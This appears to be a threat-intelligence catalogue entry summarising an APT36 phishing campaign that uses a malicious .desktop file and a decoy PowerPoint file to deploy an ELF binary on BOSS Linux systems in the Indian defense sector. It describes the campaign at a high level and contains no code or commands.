Phishing Attack: Deploying Malware on Indian Defense BOSS Linux
Essential information
- Published
- 08/08/2025 17:08
- Modified
- 10/08/2025 21:44
- Tags
- .desktop file 2025-08-08 apt36 boss linux boss.elf cyber espionage elf binary indian defense phishing transparent tribe
- Related entities
- 8 observables, 1 intrusion sets (apt), 4 techniques (mitre), 3 others
Description
APT36, a Pakistan-based threat actor, has launched a sophisticated cyber-espionage campaign targeting the Indian defense sector. The group has adapted its tactics to focus on Linux-based environments, particularly BOSS Linux, used by Indian government agencies. The attack involves phishing emails with a ZIP file containing a malicious .desktop file. When executed, it downloads a legitimate PowerPoint file as a decoy while simultaneously deploying a malicious ELF binary. This multi-stage approach aims to bypass user suspicion and evade traditional security measures. The campaign signifies an advancement in APT36's capabilities and poses an increased risk to critical government and defense infrastructure. Organizations using Linux-based systems are advised to implement robust cybersecurity controls and threat detection mechanisms to mitigate potential risks.